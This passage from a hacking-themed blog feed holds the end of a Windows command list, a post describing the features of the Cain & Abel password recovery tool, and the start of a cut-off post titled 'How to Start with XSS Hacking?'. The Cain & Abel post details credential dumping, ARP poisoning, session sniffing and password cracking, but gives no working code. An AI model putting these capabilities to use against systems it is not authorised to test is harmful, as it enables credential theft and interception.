(locally or via resource sharing)<br />PsLogList Event log records<br />PsPasswd Change account password<br />PsService View and control services<br />PsShutdown Shutdown or reboot a computer<br />PsSuspend Suspend processes<br />PUSHD Save and then change the current directory<br /><br />QGREP Search file(s) for lines that match a given pattern.<br /><br />RASDIAL Manage RAS connections<br />RASPHONE Manage RAS connections<br />RECOVER Recover a damaged file from a defective disk.<br />REG Read, Set or Delete registry keys and values<br />REGEDIT Import or export registry settings<br />REGSVR32 Register or unregister a DLL<br />REGINI Change Registry Permissions<br />REM Record comments (remarks) in a batch file<br />REN Rename a file or files.<br />REPLACE Replace or update one file with another<br />RD Delete folder(s)<br />RDISK Create a Recovery Disk<br />RMTSHARE Share a folder or a printer<br />ROBOCOPY Robust File and Folder Copy<br />ROUTE Manipulate network routing tables<br />RUNAS Execute a program under a different user account<br />RUNDLL32 Run a DLL command (add/remove print connections)<br /><br />SC Service Control<br />SCHTASKS Create or Edit Scheduled Tasks<br />SCLIST Display NT Services<br />ScriptIt Control GUI applications<br />SET Display, set, or remove environment variables<br />SETLOCAL Begin localisation of environment changes in a batch file<br />SETX Set environment variables permanently<br />SHARE List or edit a file share or print share<br />SHIFT Shift the position of replaceable parameters in a batch file<br />SHORTCUT Create a windows shortcut (.LNK file)<br />SHOWGRPS List the NT Workgroups a user has joined<br />SHOWMBRS List the Users who are members of a Workgroup<br />SHUTDOWN Shutdown the computer<br />SLEEP Wait for x seconds<br />SOON Schedule a command to run in the near future<br />SORT Sort input<br />START Start a separate window to run a specified program or command<br />SU Switch User<br />SUBINACL Edit file and folder Permissions, Ownership and Domain<br />SUBST Associate a path with a drive letter<br />SYSTEMINFO List system configuration<br /><br />TASKLIST List running applications and services<br />TIME Display or set the system time<br />TIMEOUT Delay processing of a batch file<br />TITLE Set the window title for a CMD.EXE session<br />TOUCH Change file timestamps<br />TRACERT Trace route to a remote host<br />TREE Graphical display of folder structure<br />TYPE Display the contents of a text file<br /><br />USRSTAT List domain usernames and last login<br /><br />VER Display version information<br />VERIFY Verify that files have been saved<br />VOL Display a disk label<br /><br />WHERE Locate and display files in a directory tree<br />WHOAMI Output the current UserName and domain<br />WINDIFF Compare the contents of two files or sets of files<br />WINMSD Windows system diagnostics<br />WINMSDP Windows system diagnostics II<br />WMIC WMI Commands<br /><br />XCACLS Change file permissions<br />XCOPY Copy files and folders</span></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-82176046670914462372011-02-23T11:39:00.000-08:002011-06-27T20:13:52.750-07:00Intro : Cain And Abel Tool<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 16px;"><div style="margin-bottom: 15px; margin-top: 0px;">This is the tool I used sometimes to recover passwords that I have forgotten. I do not encourage hacking. This tool is actually considered a backdoor sometimes by some of the security software in the market. Personally I think it is useful, but people tend to abuse it.</div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://www.oxid.it/cain.html" style="color: #0066cc; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;">Cain & Abel</a> is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.</div><div style="margin-bottom: 15px; margin-top: 0px;">Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.</div><div style="margin-bottom: 15px; margin-top: 0px;"><span id="more-157"></span></div><div style="margin-bottom: 15px; margin-top: 0px;"></div><div style="margin-bottom: 15px; margin-top: 0px;">The tool is divided into 2, namely Cain, and Abel.</div><div style="margin-bottom: 15px; margin-top: 0px;"><strong>Cain’s features</strong></div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://twit88.com/blog/wp-content/uploads/2007/10/cain.png" style="color: #0066cc; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title=""><img alt="" src="http://twit88.com/blog/wp-content/uploads/2007/10/cain.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /></a></div><ol><li style="list-style-type: decimal;">Protected Storage Password Manager<br />Reveals locally stored passwords of Outlook, Outlook Express, Outlook Express Identities, Outlook 2002, Internet Explorer and MSN Explorer.</li><li style="list-style-type: decimal;">Credential Manager Password Decoder<br />Reveals passwords stored in Enterprise and Local Credential Sets on Windows XP/2003.</li><li style="list-style-type: decimal;">LSA Secrets Dumper<br />Dumps the contents of the Local Security Authority Secrets.</li><li style="list-style-type: decimal;">Dialup Password Decoder<br />Reveals passwords stored by Windows “Dial-Up Networking” component.</li><li style="list-style-type: decimal;">APR (ARP Poison Routing)<br />Enables sniffing on switched networks and Man-in-the-Middle attacks.</li><li style="list-style-type: decimal;">Route Table Manager<br />Provides the same functionality of the Windows tool “route.exe” with a GUI front-end.</li><li style="list-style-type: decimal;">SID Scanner<br />Extracts user names associated to Security Identifiers (SIDs) on a remote system.</li><li style="list-style-type: decimal;">Network Enumerator<br />Retrieves, where possible, the user names, groups, shares, and services running on a machine.</li><li style="list-style-type: decimal;">Service Manager<br />Allows you to stop, start, pause/continue or remove a service.</li><li style="list-style-type: decimal;">Sniffer<br />Captures passwords, hashes and authentication information while they are transmitted on the network. Includes several filters for application specific authentications and routing protocols. The VoIP filter enables the capture of voice conversations transmitted with the SIP/RTP protocol saved later as WAV files.</li><li style="list-style-type: decimal;">Routing Protocol Monitors<br />Monitors messages from various routing protocols (HSRP, VRRP, RIPv1, RIPv2, EIGRP, OSPF) to capture authentications and shared route tables.</li><li style="list-style-type: decimal;">Full RDP sessions sniffer for APR (APR-RDP)<br />Allows you to capture all data sent in a Remote Desktop Protocol (RDP) session on the network. Provides interception of keystrokes activity client-side.</li><li style="list-style-type: decimal;">Full SSH-1 sessions sniffer for APR (APR-SSH-1)<br />Allows you to capture all data sent in a HTTPS session on the network.</li><li style="list-style-type: decimal;">Full HTTPS sessions sniffer for APR (APR-HTTPS)<br />Allows you to capture all data sent in a HTTPS session on the network.</li><li style="list-style-type: decimal;">Certificates Collector<br />Grab certificates from HTTPS web sites and prepares them to be used by APR-HTTPS.</li><li style="list-style-type: decimal;">MAC Address Scanner with OUI fingerprint<br />Using OUI fingerprint, this makes an informed guess about what type of device the MAC address from.</li><li style="list-style-type: decimal;">Promiscuous-mode Scanner based on ARP packets<br />Identifies sniffers and network Intrusion Detection systems present on the LAN.</li><li style="list-style-type: decimal;">Wireless Scanner<br />Can scan for wireless networks signal within range, giving details on its MAC address, when it was last seen, the guessed vendor, signal strength, the name of the network (SSID), whether it has WEP or not (note WPA encrypted networks will show up as WEPed), whether the network is an Ad-Hoc network or Infrastructure, what channel the network is operating at and at what speed the network is operating (e.g. 11Mbps). Passive scanning and WEP IVs sniffing are also supported using the AirpCap adapter from CACE Technologies.</li><li style="list-style-type: decimal;">802.11 Capture Files Decoder<br />Decode 802.11 capture files (wireshark, pcap) containing wireless frames encrypted with WEP or WPA-PSK.</li><li style="list-style-type: decimal;">Access (9x/2000/XP) Database Passwords Decoder<br />Decodes the stored encrypted passwords for Microsoft Access Database files.</li><li style="list-style-type: decimal;">Base64 Password Decoder<br />Decodes Base64 encoded strings.</li><li style="list-style-type: decimal;">Cisco Type-7 Password Decoder<br />Decodes Cisco Type-7 passwords used in router and switches configuration files.</li><li style="list-style-type: decimal;">Cisco VPN Client Password Decoder<br />Decodes Cisco VPN Client passwords stored in connection profiles (*.pcf).</li><li style="list-style-type: decimal;">VNC Password Decoder<br />Decodes encrypted VNC passwords from the registry.</li><li style="list-style-type: decimal;">Enterprise Manager Password Decoder<br />Decodes passwords used by Microsoft SQL Server Enterprise Manager (SQL 7.0 and 2000 supported).</li><li style="list-style-type: decimal;">Remote Desktop Password Decoder<br />Decodes passwords in Remote Desktop Profiles (.RPD files).</li><li style="list-style-type: decimal;">PWL Cached Password Decoder<br />Allows you to view all cached resources and relative passwords in clear text either from locked or unlocked password list files.</li><li style="list-style-type: decimal;">Password Crackers<br />Enables the recovery of clear text passwords scrambled using several hashing or encryption algorithms. All crackers support Dictionary and Brute-Force attacks.</li><li style="list-style-type: decimal;">Cryptanalysis attacks<br />Enables password cracking using the ‘Faster Cryptanalytic time – memory trade off’ method introduced by Philippe Oechslin. This cracking technique uses a set of large tables of pre calculated encrypted passwords, called Rainbow Tables, to improve the trade-off methods known today and to speed up the recovery of clear text passwords.</li><li style="list-style-type: decimal;">WEP Cracker<br />Performs Korek’s WEP Attack on capture 802.11 capture files containing WEP initialization vectors.</li><li style="list-style-type: decimal;">Rainbowcrack-online client<br />Enables password cracking by mean of the outstanding power of this on-line cracking service based on RainbowTable technology.</li><li style="list-style-type: decimal;">NT Hash Dumper + Password History Hases (works with Syskey enabled)<br />Will retrieve the NT password hash from the SAM file regardless of whether Syskey in enabled or not.</li><li style="list-style-type: decimal;">Syskey Decoder<br />Will retrieve the Boot Key used by the SYSKEY utility from the local registry or “off-line” SYSTEM files.</li><li style="list-style-type: decimal;">MSCACHE Hashes Dumper<br />Will retrieve the MSCACHE password hashes stored into the local registry.</li><li style="list-style-type: decimal;">Wireless Zero Configuration Password Dumper<br />Will retrieve the wireless keys stored by Windows Wireless Configuration Service.</li><li style="list-style-type: decimal;">Microsoft SQL Server 2000 Password Extractor via ODBC<br />Connects to an SQL server via ODBC and extracts all users and passwords from the master database.</li><li style="list-style-type: decimal;">Oracle Password Extractor via ODBC<br />Connects to an Oracle server via ODBC and extracts all users and passwords from the database.</li><li style="list-style-type: decimal;">MySQL Password Extractor via ODBC<br />Connects to an MySQL server via ODBC and extracts all users and passwords from the database.</li><li style="list-style-type: decimal;">Box Revealer<br />Shows passwords hidden behind asterisks in password dialog boxes.</li><li style="list-style-type: decimal;">RSA SecurID Token Calculator<br />Can calculate the RSA key given the tokens .ASC file.</li><li style="list-style-type: decimal;">Hash Calculator<br />Produces the hash values of a given text.</li><li style="list-style-type: decimal;">TCP/UDP Table Viewer<br />Shows the state of local ports (like netstat).</li><li style="list-style-type: decimal;">TCP/UDP/ICMP Traceroute with DNS resolver and WHOIS client<br />A improved traceroute that can use TCP, UDP and ICMP protocols and provides whois client capabilities.</li><li style="list-style-type: decimal;">Cisco Config Downloader/Uploader (SNMP/TFTP)<br />Downloads or uploads the configuration file from/to a specified Cisco device (IP or host name) given the SNMP read/write community string.</li></ol><div style="margin-bottom: 15px; margin-top: 0px;"></div><div style="margin-bottom: 15px; margin-top: 0px;"><strong>Abel features</strong></div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://twit88.com/blog/wp-content/uploads/2007/10/console.jpg" style="color: black; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title=""><img alt="" src="http://twit88.com/blog/wp-content/uploads/2007/10/console.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /></a></div><ol><li style="list-style-type: decimal;">Remote Console<br />Provides a remote system shell on the remote machine.</li><li style="list-style-type: decimal;">Remote Route Table Manager<br />Enable to manage the route table of the remote system.</li><li style="list-style-type: decimal;">Remote TCP/UDP Table Viewer<br />Shows the state of local ports (like netstat) on the remote system.</li><li style="list-style-type: decimal;">Remote NT Hash Dumper + Password History Hases (works with Syskey enabled)<br />Will retrieve the NT password hash from the SAM file regardless of whether Syskey in enabled or not; works on the Abel-side.</li><li style="list-style-type: decimal;">Remote LSA Secrets Dumper<br />Dumps the contents of the Local Security Authority Secrets present on the remote system.</li><div class="akpc_pop" style="margin-bottom: 15px; margin-top: 0px;">Popularity: 39% <span class="akpc_help">[<a href="http://alexking.org/projects/wordpress/popularity-contest" style="color: #0066cc; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title="What does this mean?">?</a>]</span></div></ol></span></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-54234967607362831152011-02-18T08:16:00.000-08:002011-06-27T20:13:52.750-07:00How to Start with XSS Hacking ?<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><img alt="" src="data:image/png;base64,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